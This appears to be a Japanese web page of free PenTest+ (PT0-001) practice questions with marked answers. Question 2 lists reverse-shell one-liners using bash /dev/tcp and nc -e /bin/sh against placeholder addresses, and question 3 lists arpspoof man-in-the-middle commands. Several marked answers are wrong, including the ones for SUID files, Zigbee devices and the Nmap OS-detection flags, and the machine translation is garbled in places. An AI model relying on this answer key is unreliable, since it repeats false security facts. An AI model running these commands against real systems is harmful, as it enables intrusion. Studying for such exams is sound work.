PT0-001日本語無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」

質問 1

施設での柵のジャンプを防ぐのに最適なのは次のうちどれですか？

（A）フェンスに向かって角度を付けたビデオカメラを配置します。

（B）施設とは反対側の柵にトップガードを追加します。

（C）フェンス内のリンク間の距離を短くします。

（D）施設の周囲に適切な照明を設置します。

正解：D 解答を投票する

質問 2

ペネトレーションテスタは、ポート443を介して任意のホストに無制限のネットワークを持つシステムを危険にさらします。侵入テスト担当者は、被害者から攻撃者に戻るためのリバースシェルを作成しようとしています。侵入テスト担当者は、次の方法のうちどれを使用するのが好きですか？

（A）bash -i>＆/ dev / tcp / <DESTINATIONIP> / 443 0>＆1

（B）perl -e 'use SOCKET'; $ i = '<SOURCEIP>; $ p = 443;

（C）nc -e / bin / sh <SOURCEIP> 443

（D）ssh superadmin @ <DESTINATIONIP> -p 443

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 3

悪意のあるユーザーがコンピュータにMITM攻撃を仕掛けたいと考えています。コンピュータのネットワーク構成は以下のとおりです。
IP：192.168.1.20
NETMASK：255.255.255.0
デフォルトゲートウェイ：192.168.1.254
DHCP：192.168.1.253
DNS：192.168.10.10、192.168.20.10
悪意のあるユーザーがMITM攻撃を仕掛けるために実行するべき次のコマンドはどれですか。

（A）arpspoof -r -t 192 .168.1.253 192.168.1.20

（B）arpspoof -c both -r -t 192.168.1.1 192.168.1.20

（C）arpspoof -c both -t 192.168.1.20 192.168.1.253

（D）arpspoof -t 192.168.1.20 192.168.1.254

正解：D 解答を投票する

質問 4

セキュリティコンサルタントが以前に識別されたユーザーアカウントでデバイスを攻撃しようとしています。

次の種類の攻撃のうちどれが実行されていますか？

（A）リバースシェル攻撃

（B）クレデンシャルダンプ攻撃

（C）ハッシュ攻撃に合格

（D）DLLインジェクション攻撃

正解：C 解答を投票する

質問 5

ネットワーク脆弱性スキャンの結果をクライアントのIT部門に伝達する場合、次のメトリックのどれが結果の重大度を最も優先しますか？（2つ選択）

（A）修復のしやすさ

（B）脅威マップの統計

（C）影響を受けるソフトウェアのバージョン

（D）影響の重要度

（E）CVSSスコア

（F）メディア報道の普及

正解：D、E 解答を投票する

質問 6

ペネトレーションテスターはLinuxを実行しているローカルマシンにアクセスできますが、アカウントの権限は制限されています。テスターが特権昇格に最適に使用できるファイルの種類は次のうちどれですか？

（A）/ usr / binに保存されているバイナリ

（B）間違ったACLルールが構成されたファイル

（C）/ rootディレクトリに保存されているファイル

（D）権限4xxxのファイル

正解：C 解答を投票する

質問 7

技術者が次のレポートを確認しています。この情報を前提として、誤検知である各脆弱性の「確認済み」列に「誤検知」トークンをドラッグすることにより、どの脆弱性が誤検知であると明確に確認できるかを特定します。

正解：

質問 8

スピアフィッシング攻撃の例はどれですか？

（A）散水穴攻撃を受けた組織をターゲットとする

（B）特定のチームをEメール攻撃で狙う

（C）USBキードロップでランダムユーザーをターゲットにする

（D）SMS攻撃でエグゼクティブを狙う

正解：B 解答を投票する

質問 9

ペネトレーションテスターは、セキュリティの問題についてZigbeeの実装を確認しています。テスターが最もテストする可能性が高いデバイスタイプは次のうちどれですか？

（A）PoS

（B）Router

（C）WAF

（D）loT

正解：B 解答を投票する

質問 10

ペネトレーションテスターがターゲットネットワークのHeartbleedの脆弱性を発見するこの脆弱性を悪用した結果として生じる影響は次のうちどれですか？

（A）man-in-the-middle攻撃を使用して、Cookieの内容を盗聴することができます。

（B）攻撃者はセッションIDを盗んで、他のユーザーになりすますことができます

（C）公開証明書の内容はトラフィックの復号化に使用できます

（D）影響を受けるシステムでコードを実行できます

正解：B 解答を投票する

質問 11

次のうちどれが侵入テスターがエンゲージメントの最後にchkconfig --del servicenameコマンドを実行する理由ですか？

（A）持続性を報告する

（B）永続性を確認する

（C）永続性を解除する

（D）罰を有効にする

正解：C 解答を投票する

質問 12

侵入テスト担当者が、コンピュータで次のNmapスキャンを実行しました。
nmap-aV 192.168.1.5
組織はそれが環境からTelnetを無効にしたと言いました。ただし、Nmapスキャンの結果では、SSHに対してポート22がクローズ、ポート23がオープンと表示されています。次のうちどれが起こったことのための最良の説明ですか？

（A）Port 22 was filtered.

（B）Nmap results contain a false positive for port 23.

（C）The service is running on a non-standard port.

（D）The organization failed to disable Telnet.

正解：D 解答を投票する

質問 13

侵入テスト担当者は、IPアドレスのリストを含む会社提供のテキストファイルを使用して、NmapでOSの運指を行うことを求められています。このスキャンを実行するために必要なものはどれですか？（2つ選んでください。）

（A）-sS

（B）-V

（C）-O

（D）oN

（E）-oX

（F）-iL

正解：D、F 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 14

侵入テスト担当者が、脆弱性スキャンを実行する前に、一部のリモートホストで最初の情報収集を行っています。
テスターは次のコマンドを実行します。
nmap -p 192.168.1.1、192.168.1.2、192.168.1.3 -sV -o --max-rate 2 192.168.1.130
次のうちどれが複数のIPアドレスが指定されているのか説明していますか。

（A）The tester is trying to perform a more stealthy scan by including several bogus addresses.

（B）A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.

（C）The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets.

（D）The scanning machine has several interfaces to balance the scan request across at the specified rate.

正解：C 解答を投票する

質問 15

内部侵入テストの間に、いくつかのマルチキャストおよびブロードキャスト名前解決要求がネットワークを通過するのが観察されます。次のツールのどれがネットワークリソースの偽装や認証要求の収集に使用される可能性がありますか？

（A）エターキャップ

（B）レスポンダ

（C）メデューサ

（D）Tcpdump

正解：B 解答を投票する

PT0-001日本語無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」

弊社を連絡する

関連リンク

トップ試験

PT0-001日本語 無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」

弊社を連絡する

関連リンク

トップ試験

PT0-001日本語無料問題集「CompTIA PenTest+ Certification Exam (PT0-001日本語版)」